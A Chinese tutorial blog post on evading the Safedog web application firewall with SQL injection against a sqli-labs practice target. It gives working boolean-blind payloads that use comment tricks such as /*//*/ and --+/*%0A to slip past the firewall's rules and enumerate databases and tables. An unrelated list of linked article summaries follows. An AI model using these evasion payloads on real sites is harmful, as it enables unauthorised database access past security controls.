安全狗的绕过

环境:
phpstudy2018
安全狗apache版
sqllabs靶场

 

安全狗绕过思路:

      安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。

       为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代码,可以看到我们输入的语句和数据库执行的语句,可以在对应位置上加入这两条语句。

echo "有效输入:".$id."<br>";
echo "mysql:"."$sql"."<br>";

 

安全狗绕过步骤:

1.以第八关基于单引号的布尔为例,首先探测注入点

输入?id=1' and1=1 --+,并不会被安全狗拦截

输入?id=1' and 1=1 --+,被安全狗拦截,反向印证了安全狗是检测and和空格组合体的

2.此时绕过空格,利用/*//*/绕过空格。此字符表示注释/*/表示一个闭合,*字符被两边的/共用了

?id=1' and/*//*/1=1 --+

如果不理解为什么/*/为什么是一个闭合可以到mysql管理器去执行

3.下面探测数据库长度,在这里安全狗检测and空格和database(),也可以通过/*//*/绕过

绕过语句:?id=1' and/*//*/length(database(/*/*/))>7--+

4.下面探测数据表,此处需要绕过and和from后面的空格,information_schema.tables和database(),and和from和database()都已经绕过了,核心就是绕过information_schema.tables,这里采用的方式是--+/*0ainformation_schema.tables,--代表将本行的sql语句注释掉了,+号充当空格,%0a表示闭合

绕过语句:?id=1' and/*//*/substr((select table_name from/*//*/--+/*%0Ainformation_schema.tables where table_schema=database(/*//*/) limit 0,1),1,1)='e'--+

如果不理解具体如何执行,可以把sql语句放到mysql管理器执行查看闭合方式

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/62526.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Android Watchdog 狗子到底做了啥

作者&#xff1a;流浪汉kylin 原文链接&#xff1a;https://juejin.cn/post/7215498393429983291 前言 有一定开发经验的或多或少有听过Watchdog&#xff0c;那什么是Watchdog呢&#xff1f;Watchdog又称看门狗&#xff0c;看门狗是育碧开发的一款游戏&#xff0c;目前已出到《…

python程序编程代码大全,python编程代码详解

大家好&#xff0c;本文将围绕python程序编程代码大全展开说明&#xff0c;python编程游戏代码是一个很多人都想弄明白的事情&#xff0c;想搞清楚python代码大全简单需要先了解以下几个事情。 1、python编程例子有哪些&#xff1f; python编程经典例子&#xff1a; 1、画爱心…

宝峰数科带你读懂数字家庭的真正内涵

由建标〔2021〕28号文《关于加快发展数字家庭提高居住品质的指导意见》开启的数字家庭国家建设已有一年多&#xff0c;但仍有不少人不能清晰理解数字家庭与早已存在的智能家居、智慧家庭、全屋智能等传统智能之间的区别&#xff0c;业内对数字家庭的认识还不够深入、有待提高。…

易观数科代码埋点、全埋点、可视化埋点

讲埋点的文章那么多&#xff0c;我们为什么还要写它&#xff1f;首先&#xff0c;这不是一篇纯技术文章&#xff0c;而是从一个非技术人员的角度&#xff0c;希望通过浅显的语言描述&#xff0c;让运营同学能快速了解概念。 此外&#xff0c;目前市面的埋点文章&#xff0c;要…

京东数科(实习一面)

数据库之范式数据库之索引线程间通信反射什么是字节码&#xff1f;采用字节码的最大好处是什么&#xff1f;Java如何实现一次编译到处运行的。 数据库之范式 目前关系型数据库一共有 6 种范式&#xff0c;按照范式级别&#xff0c;从低到高分别是&#xff1a;1NF&#xff08;第…

360数科发布2020全年财报:全年收入上涨47.1%,科技为运营效率提供第一动力

3月16日&#xff0c;360数科发布2020年第4季度及全年未经审计的财务报告。2020财年&#xff0c;360数科实现收入135.64亿元&#xff0c;较2019年92.2亿元增长47.1%&#xff1b;非美国会计准则&#xff08;Non-GAAP&#xff09;下净利润为37.97亿元&#xff0c;较2019年27.52亿元…

不追逐标准化产品,360数科的一站式风控体系有何不同?

新冠肺炎疫情无疑加速了金融行业数字化转型&#xff0c;竞争者不断涌入&#xff0c;逐渐形成由BATJ、传统银行旗下金融科技子公司、以及专注于金融机构的数字化服务公司构成的竞争格局。然而&#xff0c;风控始终是金融行业的核心。作为定位于中国零售金融领域科技服务商的360数…

没有场景,不做单点技术输出,360数科如何做金融科技的最佳实践?

作者 | Just 出品 | AI科技大本营&#xff08;ID:rgznai100&#xff09; 从互联网金融公司转变为金融科技公司&#xff0c;品牌升级后的360数科强化了“科技”的外衣。 在近期的首个360数科技术开放日&#xff0c;360数科CEO吴海生表示&#xff0c;他们已经做好金融科技的最佳…

融象数科Java开发实习记录(一)

遇到的问题和解决方法 maven安装依赖卡死 重启等方法无效。 解决办法 修改maven Importing的jvm参数, 默认为700多, 直接修改成 -Xms1024m -Xmx2048m后端启动后&#xff0c;访问前端出现数据库字段无法识别错误 数据库和前后端代码无错&#xff0c;重新安装依赖无效&#…

联通数科一面+二面+面谈 经验分享 base济南

联通数科一面二面面谈 10.8 投递简历&#xff08;大数据开发岗位 base西安 有成都岗&#xff1f; 我怎么没看到&#xff09; 10.10-12 笔试 11.05 一面 有五六个面试官 问了问题的有两个 介绍了下项目&#xff0c;问了些每个组件的基础知识&#xff0c;都是大数据的基本八股…

京东数科Java一面面经

1.哪些情况不要创建索引 哪些情况不要创建索引 1)表记录太少 300万数据时MySQL性能就开始下降了&#xff0c;这时就可以开始开始优化了 2)经常增删改的表 提高了查询速度&#xff0c;同时却会降低更新表的速度&#xff0c;如对表进行INSERT、UPDATE和DELETE。 因为更新表…

联通数科面试准备

Spring中Bean的生命周期 Spring Bean的生命周期全过程分为5个阶段&#xff0c;创建前准备阶段、创建实例阶段、依赖注入阶段和容器缓存阶段以及销毁实例阶段。 阶段1&#xff1a;创建前准备阶段这个阶段主要是在开始Bean加载之前&#xff0c;从Spring上下文中去获取相关的配置…

360数科华丽财报下的增长困局

配图来自Canva 8月24日&#xff0c;360数科发布了2020年第二季度财报&#xff0c;这也是自8月7日360金融升级为360数科之后的第一份财报。 财报数据显示&#xff0c;360数科本季度财报营收、利润均实现了大幅度上涨&#xff0c;综合科技服务收入增长尤其明显&#xff0c;成为…

京东数科统一接入网关JDDLB性能优化之QAT加速卡

京东数科JDDLB作为京东数科最重要的公网流量入口&#xff0c;承接了很多重要业务的公网流量。目前&#xff0c;已成功接替商业设备F5所承载的流量&#xff0c;并在数次618、双十一大促中体现出优越的功能、性能优势。 本文作为京东数科七层负载 | HTTPS硬件加速 (Freescale加速…

ITest:京东数科接口自动化测试实践

导读&#xff1a;你是否为每天“点点点”的工作而感到索然无味&#xff1f;你是否苦于没有合适的工具而对复杂的测试任务望而却步&#xff1f;频繁变动的接口&#xff0c;重复的功能测试&#xff0c;你&#xff0c;疲惫么&#xff1f;京东数科平台开发团队基于日常接口测试经验…

Thinkphp5 使用Paypal 支付

1&#xff0c;首先前往官网https://www.paypal.com 创建一个账户&#xff0c;我创建的是一个企业账户 2&#xff0c;前往paypal开发者平台https://developer.paypal.com/ 进行创建应用&#xff08;使用谷歌自带的翻译&#xff0c;把网页翻译过来....&#xff09; 3&#xff0c…

OpenCart中PayPal Payments Standard(Paypal 标准支付方式)设置

当你安装Install (Paypal 标准支付方式)PayPal Payments Standard这个支付方式后&#xff0c;编辑Edit它&#xff0c;需要填写许多参数。 本教程<< OpenCart中PayPal Payments Standard(Paypal 标准支付方式)设置 >>由 OpenCart中国网站 制作&#xff0c;转…

paypal国际支付的对接,使用tp5开发paypal

前言 paypal是一种国际支付&#xff0c;并且是一个免费的产品&#xff0c;用户支付并不需要扣除用户消费的手续费&#xff0c;只在商家端扣除的&#xff0c;是一个不错的国际支付 2.下载 直接到github下载php-sdk包&#xff0c;我下载完直接在extend中使用 使用 <?p…

Stripe国际支付平台接入

Stripe 是一家科技公司&#xff0c;致力于为互联网经济打造基础设施。所有公司&#xff0c;无论规模大小&#xff0c;从初创公司到上市企业&#xff0c;都可以用我们的软件来收款和管理他们的线上业务。 引用stripe 公司介绍的一段话&#xff1a;“我们的使命是&#xff1a;增…

TP5集成PayPal支付

项目需要使用到PayPal支付,在网上找了一圈大多写的太过简陋不易看懂,在这里详细记录集成过程方便后期使用. 第一步:下载PayPal-PHP-SDK集成到项目中 最新SDK下载地址: https://github.com/paypal/PayPal-PHP-SDK/releases 官方英文文档:点击打开链接 下载sdk解压,我们需要使用…